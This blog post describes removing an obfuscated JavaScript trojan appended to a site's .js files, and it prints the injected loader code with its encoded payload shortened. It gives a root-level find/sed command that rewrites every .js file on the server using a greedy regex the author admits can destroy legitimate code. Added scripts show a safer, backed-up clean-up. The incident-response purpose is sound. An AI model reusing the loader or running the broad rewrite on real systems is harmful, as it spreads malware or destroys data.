Curing a site of a virus in JavaScript and other files, by example

    Once I received a letter from Yandex.Webmaster saying that one of my sites was infected: "The site contains code that could be dangerous for visitors", and that the site was currently shown in the search results with the label "This site may threaten the security of your computer".

    A quick analysis showed that the *.js files were infected: the following code had been appended to the end of each of them:

    try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
    .... many more of the same numbers here ....
    $19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

    After looking through the search results on searching and replacing text in files under Linux, I had several variants of the console command. I then logged in to the server via SSH and ran the following as root:

    find / -name "*.js" -type f -print0 | xargs -0 sed -i 's/try{q=document\.createElement.*}/#cleaned/g'

    After it finished, all .js files were cleared of the trojan.

    This command searches the whole server for files with the .js extension and looks in each of them for text matching the regular expression try{q=document\.createElement.*}, which describes the trojan; it then replaces that text with the line #cleaned.
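The same clean-up as a small script, added here as an example and not taken from the original post: it first lists the affected files (a dry run), keeps a .bak copy of each file it touches, and then checks that nothing is left. It assumes a POSIX sh with GNU sed (-i) and GNU grep (-r, -l, -F, --include); the two sample .js files are constructed for the demo, and the injected line in infected.js is an inert stand-in that only shares the start (try{q=document.createElement("d"+"i"+"v")) and the tail (e(q);}) of the real injected code.

```shell
#!/bin/sh
# Added example, not code from the original post. It reproduces the post's
# find + sed clean-up as a script that lists the affected files first (dry
# run), keeps a .bak copy of each one, and then verifies nothing is left.
# Assumptions: POSIX sh with GNU sed (-i) and GNU grep (-r, -l, -F,
# --include). The sample .js files are constructed; the injected line in
# infected.js is an inert stand-in that only shares the start and the
# `e(q);}` tail of the real injected code.

# Fixed-string marker used for listing (no regex metacharacters involved).
SIG_PLAIN='try{q=document.createElement("d"+"i"+"v")'
# sed rule for removal. Unlike the post's `createElement.*}`, it is tied to
# both the specific start and the `e(q);}` tail of the injected block, so a
# legitimate try/catch around createElement on the same line is not eaten.
CLEAN_RULE='s|try{q=document\.createElement("d"+"i"+"v");.*e(q);}|/*cleaned*/|g'

# Write the constructed sample files into directory $1.
make_samples() {
    cat >"$1/infected.js" <<'EOF'
function app() { return "legit"; }
try{q=document.createElement("d"+"i"+"v");/* constructed inert stand-in for the payload */e(q);}
EOF
    cat >"$1/clean.js" <<'EOF'
function helper() { return 42; }
EOF
}

# Dry run: print the path of every .js file under $1 that carries the marker.
list_infected() {
    grep -rlF --include='*.js' "$SIG_PLAIN" "$1"
}

# Number of infected files under $1 (grep exits 1 when nothing matches, but
# the pipeline status comes from tr, so set -e does not trip here).
count_infected() {
    list_infected "$1" | wc -l | tr -d ' '
}

# Remove the injected block from one file, keeping a backup as FILE.bak.
clean_file() {
    cp -p "$1" "$1.bak"
    sed -i "$CLEAN_RULE" "$1"
}

# Clean every infected file under $1.
clean_dir() {
    list_infected "$1" | while IFS= read -r f; do
        clean_file "$f"
    done
}

# Stand-alone demo on a temporary directory.
demo() {
    d=$(mktemp -d)
    make_samples "$d"
    echo "infected before: $(count_infected "$d")"
    clean_dir "$d"
    echo "infected after:  $(count_infected "$d")"
    rm -rf "$d"
}
demo
```

Run it on a copy of the web root first (list_infected alone is the dry run); the .bak files are what let you roll back if the pattern matched something it should not have.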

    After that, it is advisable to go over the entire server with an antivirus, for example ClamAV.

    On the RedHat/CentOS family you can install it with the command
    yum install clamav
    and then run
    clamscan -ri -l /home/scan-report.txt /
    This scans the entire server recursively and saves the report to the file /home/scan-report.txt. The report will contain only information about infected files.

    Antivirus detection names for this infection:
    ClamAV scan result: Trojan.Blackhole-483
    Comodo scan result: TrojWare.JS.Blacole

    I want to say that there are other ways to find and delete a substring in files, including ones that print the results, create backup files, and faster options using ack-grep.

    For example, various search-and-replace options are listed here.

    PS. In this way you can get rid of various similar infections. But remember, this only removes the symptoms. After detecting and cleaning up the infection, you need to analyze the server for vulnerabilities.
    Read the logs in the /var/log/ folder, the /var/log/messages file, and the others available depending on your software and *nix distribution.
    Update the software, both on the server and the site engines themselves with their modules. And while updating and configuring the server software may be one specialist's job, the site engines and their modules most likely belong to someone else.

    UPD. In the comments it was rightly pointed out that the given regular expression
    /try{q=document\.createElement.*}/
    matches any text that starts with
    try{q=document\.createElement and ends with }.
    Before using it, I recommend making sure that you do not use such constructions in your code for legitimate purposes, or tightening the regular expression.
    Use at your own risk, and think before you run it.
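A small check for that caveat, added here as an example and not part of the original post: it runs the post's greedy pattern and a tightened one over two constructed one-line inputs, a legitimate try/catch around createElement followed by more code on the same line, and an inert stand-in for the appended trojan line that only copies its start and its e(q);} tail. It assumes a POSIX sh with GNU sed.

```shell
#!/bin/sh
# Added example, not from the original post: shows on constructed one-line
# inputs why the post's greedy pattern can eat legitimate code, and what a
# pattern tied to the injected block's own start and end does instead.
# Assumptions: POSIX sh with GNU sed; both sample lines are constructed, and
# INJECTED is an inert stand-in that only copies the start and the `e(q);}`
# tail of the injected code.

# The post's rule: `.*}` runs to the LAST `}` on the line.
GREEDY_RULE='s/try{q=document\.createElement.*}/#cleaned/g'
# Tightened rule: requires the trojan's own "d"+"i"+"v" start and e(q);} tail.
TIGHT_RULE='s/try{q=document\.createElement("d"+"i"+"v");.*e(q);}/#cleaned/g'

# A perfectly normal line a site might legitimately contain.
LEGIT='try{q=document.createElement("div");q.id="x";}catch(e){} function keep(){}'
# Constructed stand-in for the appended trojan line.
INJECTED='try{q=document.createElement("d"+"i"+"v");/* inert stand-in */e(q);}'

# Apply sed rule $1 to the single line $2 and print the result.
apply_rule() {
    printf '%s\n' "$2" | sed "$1"
}

# Prints 1 if the rule leaves the legitimate line untouched, 0 if it damages it.
keeps_legit() {
    [ "$(apply_rule "$1" "$LEGIT")" = "$LEGIT" ] && echo 1 || echo 0
}

# Prints 1 if the rule removes the injected line, 0 otherwise.
removes_injected() {
    [ "$(apply_rule "$1" "$INJECTED")" = "#cleaned" ] && echo 1 || echo 0
}

echo "greedy: keeps legit=$(keeps_legit "$GREEDY_RULE") removes injected=$(removes_injected "$GREEDY_RULE")"
echo "tight:  keeps legit=$(keeps_legit "$TIGHT_RULE") removes injected=$(removes_injected "$TIGHT_RULE")"
```

With the greedy rule the whole legitimate line, including function keep(){}, collapses to #cleaned, because .*} extends to the last closing brace on the line; the tightened rule removes only the injected block and leaves the legitimate line alone.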

    Judging by the bookmarks, the usefulness of the post is now more visible despite the voting results.
